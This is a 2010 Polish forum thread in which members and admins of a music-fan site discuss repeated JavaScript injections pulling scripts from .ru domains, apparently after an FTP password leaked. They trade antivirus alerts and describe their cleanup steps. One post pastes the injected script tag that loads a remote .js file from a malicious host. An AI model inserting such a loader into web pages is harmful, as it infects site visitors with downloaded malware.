PPK (Portal Pism Kultowych)

Organizacyjne => Forum => Wątek zaczęty przez: Keiran w 2010-07-15 (Czw), 14:43

Tytuł: mroczne ruskie wirusy w javascripcie
Wiadomość wysłana przez: Keiran w 2010-07-15 (Czw), 14:43
ktos chyba index.php zarazil bo widze jakies laczenie sie z pantscow.ru (nie wiem co to, nie probuje nawet) a w pracy eset krzyczal ze jakies injection i nie wpuszczal w ogole.
Tytuł: mroczne ruskie wirusy w javascripcie
Wiadomość wysłana przez: pedro w 2010-07-15 (Czw), 15:36
Widzę na NoScriptcie właśnie.
Tytuł: mroczne ruskie wirusy w javascripcie
Wiadomość wysłana przez: waste w 2010-07-16 (Pią), 13:37
Hm, wczoraj Diabellus mi mówił ale myślałem, że znów jakiś fejk alert.
Zaktualizowałem forum do najnowszej wersji bo mieliśmy starą, może jakieś exploity były. Sah powywalał śmieci też jakieś z plików.
Dajcie znać jak się nadal będzie waliło.
Tytuł: mroczne ruskie wirusy w javascripcie
Wiadomość wysłana przez: Durbik w 2010-07-16 (Pią), 15:19
nikt tu nie pisze nic, więc wiadomo.

z drugiej strony pamiętam już tyle renesansów aktywności...
Tytuł: mroczne ruskie wirusy w javascripcie
Wiadomość wysłana przez: B w 2010-07-16 (Pią), 16:26
No mnie opera przez parę dni nie wpuszczała tutaj w ogóle, krzycząc że wirusy itd, dzisiaj widzę ruszyło, sah nazi mod pokonał wirusa!
Tytuł: mroczne ruskie wirusy w javascripcie
Wiadomość wysłana przez: Greybrow w 2010-07-16 (Pią), 16:58
to może od razu do smf do 2.0 zrobić?
Tytuł: mroczne ruskie wirusy w javascripcie
Wiadomość wysłana przez: Greybrow w 2010-07-29 (Czw), 08:19
WIRUSY!!!!!!!!11111111
JS/TrojanDownloader.HackLoad.AA
Tytuł: mroczne ruskie wirusy w javascripcie
Wiadomość wysłana przez: Durbik w 2010-07-29 (Czw), 08:22
!!!!!11
Tytuł: mroczne ruskie wirusy w javascripcie
Wiadomość wysłana przez: Diabellus w 2010-07-29 (Czw), 08:31
No ale da się wejść tym razem przynajmniej.
Tytuł: mroczne ruskie wirusy w javascripcie
Wiadomość wysłana przez: waste w 2010-07-29 (Czw), 08:37
Hm, szczerze mówiąc mam kłopot. Nie bardzo przychodzi mi do głowy skąd one mogą się pojawiać. Ktoś musi gdzieś kod wstrzykiwać, damn... ;(
Ale nie wiem którędy.

Ja nie widzę alertów, ale w pracy jestem i używamy nieszczęsnego FSecura. Dajcie mi znać kto widzi alerty i na jakim antywirusie.

PS. Mam nadzieję, że nikt nie używa Internet Explorer'a żeby przeglądać forum...
Tytuł: mroczne ruskie wirusy w javascripcie
Wiadomość wysłana przez: Durbik w 2010-07-29 (Czw), 10:44
na bank ktoś używa
Tytuł: mroczne ruskie wirusy w javascripcie
Wiadomość wysłana przez: waste w 2010-07-29 (Czw), 10:58
No to kiep ten ktoś i powinniśmy go zbanować immediately.
Tytuł: mroczne ruskie wirusy w javascripcie
Wiadomość wysłana przez: pedro w 2010-07-29 (Czw), 11:22
NoScript blokuje malepad.ru
Tytuł: mroczne ruskie wirusy w javascripcie
Wiadomość wysłana przez: Greybrow w 2010-07-29 (Czw), 11:26
firefox i nod4
wyświetla mi komunikaty o wirusie w themes *.js
Tytuł: mroczne ruskie wirusy w javascripcie
Wiadomość wysłana przez: Diabellus w 2010-07-29 (Czw), 11:29
firefox + avast,
JS:Illredir-CI [Trj] w pliku http://ppk.it.pl/Themes/default/script.js?fin11.
Tytuł: mroczne ruskie wirusy w javascripcie
Wiadomość wysłana przez: sah w 2010-07-29 (Czw), 11:38
 :anhero:
Tytuł: mroczne ruskie wirusy w javascripcie
Wiadomość wysłana przez: waste w 2010-07-29 (Czw), 12:21
Panowie, ten skrypt ktoś ma ciągle - ktoś z uprawnieniami do logowania itd. i on zmienia pliki FTP forum. Wszyscy musieliby również wyczyścić swoje lokalne komputery, albo musiałbym wszystkim wyłączyć prawa pisania na forum, co się mija z celem.
ADMINISTRATORZY I MODERATORZY BEZWZGLĘDNIE PROSZĘ PRZELECIEĆ SWOJE DYSKI ANTYWIRUSAMI!!!!

Teraz widzę, że wszystki pliki JavaScript w tym katalogu zostały zmienione dnia Jul 28 21:22.
Wszystkie inne pliki mają datę 16 lipca.
Tytuł: mroczne ruskie wirusy w javascripcie
Wiadomość wysłana przez: Durbik w 2010-07-29 (Czw), 14:36
może to SABOTAŻ?????????????
Tytuł: mroczne ruskie wirusy w javascripcie
Wiadomość wysłana przez: Durbik w 2010-07-30 (Pią), 10:53
a co to jest właściwie ten malepad.ru i co robi? oprócz tego że forum zamiast się ładować to się łączy z tym szitem?
Tytuł: mroczne ruskie wirusy w javascripcie
Wiadomość wysłana przez: Keiran w 2010-07-30 (Pią), 13:24
waste - to jak to jest? ktos kto ma uprawnienia do logowania moze zmieniac pliki na forum?
Tytuł: mroczne ruskie wirusy w javascripcie
Wiadomość wysłana przez: waste w 2010-07-30 (Pią), 13:35
Do zmiany plików forumowych prawa ma skrypt PHPowy.
Więc jak ktoś ma IE zabugowanego, to może skrypt z jego kompa zadziałać i zmienić pliki na FTP. To przypuszczenie, bo po prawdzie nie wiem jak to się dzieje.
Spróbuję powyłączać uprawnienia tym plikom. Aktualizacje i tak robię ręcznie.
Tytuł: mroczne ruskie wirusy w javascripcie
Wiadomość wysłana przez: sah w 2010-07-30 (Pią), 18:53
(http://img683.imageshack.us/img683/4246/letthelightcomein.jpg)

tak to jest dzieci jak się bez porządnego firewalla wchodzi na internet

w sumie jakby durny rootkit mi nie wyłączył windows update to bym nie wiedział  że coś jest nie tak
Tytuł: mroczne ruskie wirusy w javascripcie
Wiadomość wysłana przez: sah w 2010-07-30 (Pią), 19:10
Wygląda na to że sytuacja opanowana (tak jak poprzednio). Wyciąłem odnośniki do ruskich skryptów z plików .js w tematach default i phobos. Zmienię sobie hasło na forum. Waste: hasło na ftp też może by warto.
Tytuł: Odp: mroczne ruskie wirusy w javascripcie
Wiadomość wysłana przez: pedro w 2010-07-30 (Pią), 19:24
Nadal widzę malepad.ru blokowane na NoScripcie.
Tytuł: Odp: mroczne ruskie wirusy w javascripcie
Wiadomość wysłana przez: sah w 2010-07-30 (Pią), 20:01
hm... może cookies albo cache?

edit: waste, do czego służy katalog "masakra" na ftp?
Tytuł: Odp: mroczne ruskie wirusy w javascripcie
Wiadomość wysłana przez: waste w 2010-07-30 (Pią), 23:26
stare forum, można wywalić
w sensie, że jakaś kopia backupowa testowa

jakby co to łap mnie na google talk (to zwykły jabber jest) bo pieprzone gadu mi sie rozpina co chwilkę, nie chce mi się już tego pilnować.
Tytuł: Odp: mroczne ruskie wirusy w javascripcie
Wiadomość wysłana przez: Greybrow w 2010-08-02 (Pon), 21:54
http://obscurewax.ru/Yahoo.js ?
Tytuł: Odp: mroczne ruskie wirusy w javascripcie
Wiadomość wysłana przez: w 2010-08-02 (Pon), 23:18
(http://img686.imageshack.us/img686/8578/clipboard02od.jpg)
Tytuł: Odp: mroczne ruskie wirusy w javascripcie
Wiadomość wysłana przez: sah w 2010-08-02 (Pon), 23:24
around piano never relax

po prostu trzeba na firewallu zablokować adres *.ru :roll:
Tytuł: Odp: mroczne ruskie wirusy w javascripcie
Wiadomość wysłana przez: w 2010-08-02 (Pon), 23:52
A rilisy najnowszych płyt to niby skąd się biorą?
Tytuł: Odp: mroczne ruskie wirusy w javascripcie
Wiadomość wysłana przez: waste w 2010-08-03 (Wto), 09:44
Znaczy że znów??
Damn

Wyłączę wszystkim plikom możliwość zapisu, możliwe, że źle są prawa zapisu ustawione (każdy może).
Część plików musi mieć prawa zapisu przez wszystkich, ale większość nie.

______________________

Poczyściłem - czekam na ewentualne alerty.
Tytuł: Odp: mroczne ruskie wirusy w javascripcie
Wiadomość wysłana przez: Greybrow w 2010-08-03 (Wto), 14:50
dzięki!
Tytuł: Odp: mroczne ruskie wirusy w javascripcie
Wiadomość wysłana przez: Kokos w 2010-08-03 (Wto), 16:11
Mało tego PPK sta
ktos chyba index.php zarazil bo widze jakies laczenie sie z pantscow.ru (nie wiem co to, nie probuje nawet) a w pracy eset krzyczal ze jakies injection i nie wpuszczal w ogole.
Mało tego PPK stało się kokoso-dostępne, i jeszcze ta web 2.0 skórka.... taka grafitowo, szklana... może logo appla jeszcze wstawcie?

Boże odkąd dostałem bana moje życie było tak bogate w doznania codziennego życia...
Tytuł: Odp: mroczne ruskie wirusy w javascripcie
Wiadomość wysłana przez: Durbik w 2010-08-03 (Wto), 16:47
Kokos!
Tytuł: Odp: mroczne ruskie wirusy w javascripcie
Wiadomość wysłana przez: Durbik w 2010-08-13 (Pią), 11:12
pocketbloke.ru! to tam wysyłamy nasze żadania tym razem?
Tytuł: Odp: mroczne ruskie wirusy w javascripcie
Wiadomość wysłana przez: waste w 2010-08-13 (Pią), 11:21
:wilq_zly1:
Poddaję się, nie mam dostępu do logów serwera ;(
Spróbuję pogadać z adminem

edit:
Zmieniłem hasło do ftp, wieczorem usunę jeszcze raz wszystkie odwołania do skryptów bo nie mam czasu teraz.
Mam potwierdzenie, że w jakiś sposób wyciekło hasło do naszego FTPa. Pliki były ładowane notorycznie, także poprzednie moje naprawienie niewiele zmieniło. (sah miał rację!)
Tytuł: Odp: mroczne ruskie wirusy w javascripcie
Wiadomość wysłana przez: Greybrow w 2010-08-13 (Pią), 23:09
Ostrzeżenie: Odwiedzenie tej witryny może spowodować uszkodzenie komputera.
Witryna pod adresem ppk.it.pl zawiera elementy pochodzące z witryny riotassistance.ru prawdopodobnie zawierającej złośliwe oprogramowanie, które może zaszkodzić komputerowi lub w inny sposób działać bez zgody użytkownika. Samo odwiedzenie witryny zawierającej złośliwe oprogramowanie może spowodować zainfekowanie komputera.
</div>
<div id="ajax_in_progress" style="display: none;">Ładowanie...</div>
</body></html><script type="text/javascript" src="http://riotassistance.ru/CD-ROM.js"></script>
<!--0df1965351a6f0c952cb31d00e7c1fc8-->
Tytuł: Odp: mroczne ruskie wirusy w javascripcie
Wiadomość wysłana przez: sah w 2010-08-14 (Sob), 10:21
Pocieszę Cię waste że hasło musiało wyciec ode mnie, przez tego rootkita. Z tego co wiem są trojany które wykradają hasła ftp.

Co nie zmienia faktu, że dobrze jest usłyszeć "sah miał rację".
Tytuł: Odp: mroczne ruskie wirusy w javascripcie
Wiadomość wysłana przez: waste w 2010-08-15 (Nie), 07:52
Pliki poprawiłem, powinno być OK. Sprawdziłbym to wcześniej, ale to bardzo proste konto - nie mam dostępu do logów.
W międzyczasie trafiliśmy na jakiś blacklist więc się nie zdziwcie jak się okaże, że przeglądarka pokaże wam środkowy palec twierdząc, że strona jest niebezpieczna.
Anyway - powinno być ok i proszę natychmiast o info jeśli coś się wydarzy.
(Sah jak będziesz potrzebował hasło, daj znać)

edit:
Wystąpiłem do Google z prośbą o usunięcie z blacklisty, ale to pewnie trochę potrwa.
Tytuł: Odp: mroczne ruskie wirusy w javascripcie
Wiadomość wysłana przez: Crask w 2010-08-27 (Pią), 23:49
Mało tego PPK sta
ktos chyba index.php zarazil bo widze jakies laczenie sie z pantscow.ru (nie wiem co to, nie probuje nawet) a w pracy eset krzyczal ze jakies injection i nie wpuszczal w ogole.
Mało tego PPK stało się kokoso-dostępne, i jeszcze ta web 2.0 skórka.... taka grafitowo, szklana... może logo appla jeszcze wstawcie?

Boże odkąd dostałem bana moje życie było tak bogate w doznania codziennego życia...

Zastanawia mnie jedno. Jak kokos doszedł do tego, że już nie jest na PPK zbanowany ? Nie sądzę żeby do userów wysyłano wiadomości "you are unbanned", więc ciekaw jestem jak odkrył coś takiego. Przychodził sprawdzać ?
Tytuł: Odp: mroczne ruskie wirusy w javascripcie
Wiadomość wysłana przez: KaGieBe w 2010-08-28 (Sob), 08:19
Może śledził jakiś wątek i po długiej przerwie przyszło mu powiadomienie?
Tytuł: Odp: mroczne ruskie wirusy w javascripcie
Wiadomość wysłana przez: Kokos w 2013-06-04 (Wto), 10:31
Może śledził jakiś wątek i po długiej przerwie przyszło mu powiadomienie?
Tak BTW. Albo ktoś był złośliwy i tak serwer ustawił (bardziej prawdopodobne), albo jest jakiś błąd na forum (mniej prawdopodobne).

Anyway.. efekt jest taki, że od kilku ładnych już lat dostaję ostro przemnożone powiadomienia na swój inbox (dziś tylko: 61 + 32 = 93 powiadomienia). :-) Niby mnie to nie boli, bo dla gmaila to pryszcz, ale gdyby ktoś wiedział o co biega i mógłby to poprawić - byłby to całkiem miły gest. :)

(http://i.imgur.com/ARdIHOF.png)

Pzdr,
K